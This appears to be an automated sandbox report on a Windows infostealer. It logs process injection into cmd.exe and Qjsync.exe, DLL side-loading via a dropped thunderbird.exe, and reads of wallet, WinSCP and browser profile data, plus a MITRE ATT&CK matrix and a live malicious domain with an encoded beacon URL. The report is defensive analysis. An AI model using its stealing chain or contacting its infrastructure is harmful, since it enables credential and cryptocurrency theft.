Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryValueKey: Direct from: 0x7FF6A877BDFA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtCreateFile: Direct from: 0x7FF6A88E6553	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtSetInformationThread: Direct from: 0x7FFDB43E26A1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtSetInformationProcess: Direct from: 0x7FF6A875D041	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQuerySystemInformation: Direct from: 0x7FF6CCB8790D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtSetInformationProcess: Direct from: 0x7FF6A873C626	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtCreateFile: Direct from: 0x14011D7A4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtClose: Direct from: 0x7FF6A88EBBC3
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtReadVirtualMemory: Direct from: 0x7FF6A88E61EF	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtEnumerateValueKey: Direct from: 0x7FF6CCB2CE60	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtSetInformationProcess: Direct from: 0x7FF6A8747BBB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6CC995592	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtSetInformationProcess: Direct from: 0x7FF6A8778460	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtSetInformationProcess: Direct from: 0x7FF6A875BD87	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQuerySystemInformation: Direct from: 0x7FF6CCAE2B0B	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQuerySystemInformation: Direct from: 0x7FF6CCAE9FDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtQueryInformationProcess: Direct from: 0x7FF6A874C661	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6A875563F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x140120A3C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6CCB84070	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Qjsync.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Qjsync.exe protection: read write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\Qjsync.exe base: 14011BC08	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\Qjsync.exe base: 312010	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\Qjsync.exe base: 14011BC08	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\Qjsync.exe base: 321010	Jump to behavior

Source: C:\Users\user\Desktop\UolJwovI8c.exe	Process created: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe "C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe" -burn.clean.room="C:\Users\user\Desktop\UolJwovI8c.exe" -burn.filehandle.attached=684 -burn.filehandle.self=512	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Qjsync.exe C:\Users\user\AppData\Local\Temp\Qjsync.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Qjsync.exe C:\Users\user\AppData\Local\Temp\Qjsync.exe	Jump to behavior

Source: C:\Users\user\Desktop\UolJwovI8c.exe

Code function: 0_2_005D1719 InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,

0_2_005D1719

Source: C:\Users\user\Desktop\UolJwovI8c.exe

Code function: 0_2_005D3A5F AllocateAndInitializeSid,CheckTokenMembership,

0_2_005D3A5F

Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	Binary or memory string: Shell_TrayWnd
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	Binary or memory string: Progman
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	Binary or memory string: XUL_APP_FILE@mozilla.org/xre/app-info;1nsXULAppInfo1.8.1.19WINNTx86-msvchelper.exeuninstallXCurProcD@mozilla.org/file/directory_service;1/fixregargv0ignoredbywinlaunchchild/uninstalllog=%s/postupdateToolkit Profile Service@mozilla.org/toolkit/profile-service;1@mozilla.org/event-queue-service;1@mozilla.org/embedcomp/window-watcher;1@mozilla.org/toolkit/app-startup;1@mozilla.org/chrome/chrome-registry;1Native App Support@mozilla.org/toolkit/native-app-support;1ProgmanDuplicateTokenExCreateProcessWithTokenWadvapi32.dllshell32.dllIsUserAnAdminXRE_PROFILE_LOCAL_PATHXRE_PROFILE_PATHNO_EM_RESTART=0NO_EM_RESTART=1@mozilla.org/appshell/window-mediator;1final-ui-startup@mozilla.org/observer-service;1XRE_BINARY_PATH=XUL_APP_FILE=NO_EM_RESTART=XRE_IMPORT_PROFILES=XRE_START_OFFLINE=XRE_PROFILE_LOCAL_PATH=XRE_PROFILE_PATH=NO_EM_RESTARTError: argument -install-global-theme is invalid when argument -osint is specified
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	Binary or memory string: SHAppBarMessageShell_TrayWndDragFullWindowsMenuShowDelayControl Panel\DesktopclipboardcacheAOLMAIL@mozilla.org/layout/plaintextsink;1</HTML><HTML>@v

Source: C:\Users\user\Desktop\UolJwovI8c.exe

Code function: 0_2_005BEC07 cpuid

0_2_005BEC07

Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: GetKeyboardLayout,GetLocaleInfoA,		2_2_10023F71
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Code function: GetLocaleInfoA,		2_2_100708F5

Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\UolJwovI8c.exe

Code function: 0_2_005A4EDF ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,

0_2_005A4EDF

Source: C:\Users\user\Desktop\UolJwovI8c.exe

Code function: 0_2_00596037 GetSystemTime,GetDateFormatW,GetLastError,GetLastError,GetDateFormatW,GetLastError,

0_2_00596037

Source: C:\Users\user\Desktop\UolJwovI8c.exe

Code function: 0_2_005961DF GetUserNameW,GetLastError,

0_2_005961DF

Source: C:\Users\user\Desktop\UolJwovI8c.exe

Code function: 0_2_005D887B GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,

0_2_005D887B

Source: C:\Users\user\Desktop\UolJwovI8c.exe

Code function: 0_2_00595195 GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize,

0_2_00595195

Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Directory queried: C:\Users\user\Documents			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Directory queried: C:\Users\user\Documents			Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	5 Native API	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	12 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Command and Scripting Interpreter	1 Windows Service	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	11 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	Logon Script (Windows)	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Windows Service	11 DLL Side-Loading	NTDS	146 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	213 Process Injection	1 File Deletion	LSA Secrets	121 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	121 Masquerading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	11 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	213 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
UolJwovI8c.exe	3%	ReversingLabs
UolJwovI8c.exe	6%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\idrccptxisabu	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\ekxwihvmv	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Qjsync.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\js3250.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\nsldap32v50.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\nsldappr32v50.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\nspr4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\nss3.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\plc4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\plds4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\smime3.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\softokn3.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\ssl3.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\xpcom_compat.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\GZManage\xpcom_core.dll	4%	ReversingLabs
C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\Trombone.dll	4%	ReversingLabs
C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\js3250.dll	0%	ReversingLabs
C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\nsldap32v50.dll	0%	ReversingLabs
C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\nsldappr32v50.dll	0%	ReversingLabs
C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\nspr4.dll	0%	ReversingLabs
C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\nss3.dll	0%	ReversingLabs
C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\plc4.dll	0%	ReversingLabs
C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\plds4.dll	0%	ReversingLabs
C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\smime3.dll	0%	ReversingLabs
C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\softokn3.dll	0%	ReversingLabs
C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\ssl3.dll	0%	ReversingLabs
C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	0%	ReversingLabs
C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\xpcom_compat.dll	0%	ReversingLabs
C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\xpcom_core.dll	4%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://home.netscape.com/NC-rdf#CharsetDetector	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#extension	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#StatusText	0%	Avira URL Cloud	safe
https://amenstilo.website:443H	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#persist	0%	Avira URL Cloud	safe
https://amenstilo.website/courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%2FsjqNL9WLjcuO1JIs5YlYwsq2r0v2XtuOfeIISqlAWv5gAlx740W1uYA%2FAE%2FbB%2BPI3Lm%2FUw%3D%3D	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#DownloadFlaggedMessageshttp://home.netscape.com/NC-rdf#MarkAllMessag	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#PageTitleSMTP	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#IsDefaultServer	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Name	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#value	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Modify	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#alwaysAsk	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#IconURL	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#SpecialFolder	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#CanGetIncomingMessages	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#IsWriteable	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Junk	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Synchronize	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Enabledfilter;filterName=filterName=MsgBiffinserting	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#EmptyTrash	0%	Avira URL Cloud	safe
https://amenstilo.website:443/courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#StatusText	0%	Virustotal		Browse
http://home.netscape.com/NC-rdf#	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#DeleteCardshttp://home.netscape.com/NC-rdf#DirTreeNameSorthttp://hom	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#extension	0%	Virustotal		Browse
http://home.netscape.com/NC-rdf#IEFavoriteFolder	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#SupportsFilters	0%	Avira URL Cloud	safe
https://amenstilo.website/Q-	0%	Avira URL Cloud	safe
https://amenstilo.website:443	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#CanSubscribe	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#DeleteCards	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#NoSelect	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#PageTitleFakeAccount	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#CanCompact	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#CanCreateSubfolders	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#ImapShared	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#FolderTreeSimpleName	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#handleInternal	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#InVFEditSearchScope	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#TotalUnreadMessages	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Server	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#IsDeferred	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Namehttp://home.netscape.com/NC-rdf#Checkedhttp://home.netscape.com/	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#MarkAllMessagesRead	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#description	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#attribute	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Move	0%	Avira URL Cloud	safe
https://amenstilo.website/N	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#CompactAll	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Content-Length	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#IsSessionDefaultServerNC:smtpservershttp://home.netscape.com/NC-rdf#	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#NewFolder	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#CopyFolder	0%	Avira URL Cloud	safe
https://amenstilo.website/A-$	0%	Avira URL Cloud	safe
https://amenstilo.website/(O	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#SyncDisabled	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#HasUnreadMessages	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#IsMailList	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#PageTitleDiskSpace	0%	Avira URL Cloud	safe
https://amenstilo.website/J	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#DirName	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#SubfoldersHaveUnreadMessages	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#DirTreeNameSort	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#PageTitle	0%	Avira URL Cloud	safe
https://amenstilo.website/F	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Subscribablehttp://home.netscape.com/NC-rdf#Subscribedhttp://home.ne	0%	Avira URL Cloud	safe
https://amenstilo.website/	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#CanFileMessages	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#CanRename	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#GetNewMessages	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#fileExtensions	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#CanSearchMessages	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#LeafName	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#PageTitleMain	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#PageTitleAddressing	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#DownloadState	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#CanCreateFoldersOnServer	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Identity	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Name?sort=true	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#FolderSize	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#prettyNamehttp://home.netscape.com/NC-rdf#alwaysAskhttp://home.netsc	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#DownloadFlaggedMessages	0%	Avira URL Cloud	safe
http://home.netscape.com/NC-rdf#Enabled	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false		high
amenstilo.website	104.21.74.149	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://amenstilo.website/courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%2FsjqNL9WLjcuO1JIs5YlYwsq2r0v2XtuOfeIISqlAWv5gAlx740W1uYA%2FAE%2FbB%2BPI3Lm%2FUw%3D%3D	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://home.netscape.com/NC-rdf#StatusText	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.vmware.com/0	thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History	cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3012310782.00000001401F4000.00000002.00000001.01000000.00000027.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.softwareok.com/?Freeware/Find.Same.Images.OK	cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3012310782.00000001401F4000.00000002.00000001.01000000.00000027.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#CharsetDetector	thunderbird.exe, 00000003.00000000.2157387676.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000002.2265907816.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422053504.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp, thunderbird.exe, 00000004.00000000.2264998522.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
https://amenstilo.website:443H	Qjsync.exe, 0000000C.00000003.2923611263.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2967722836.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990394887.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2989853396.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2943182905.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2903508032.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2943745386.00000000004F4000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2884218408.00000000004FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
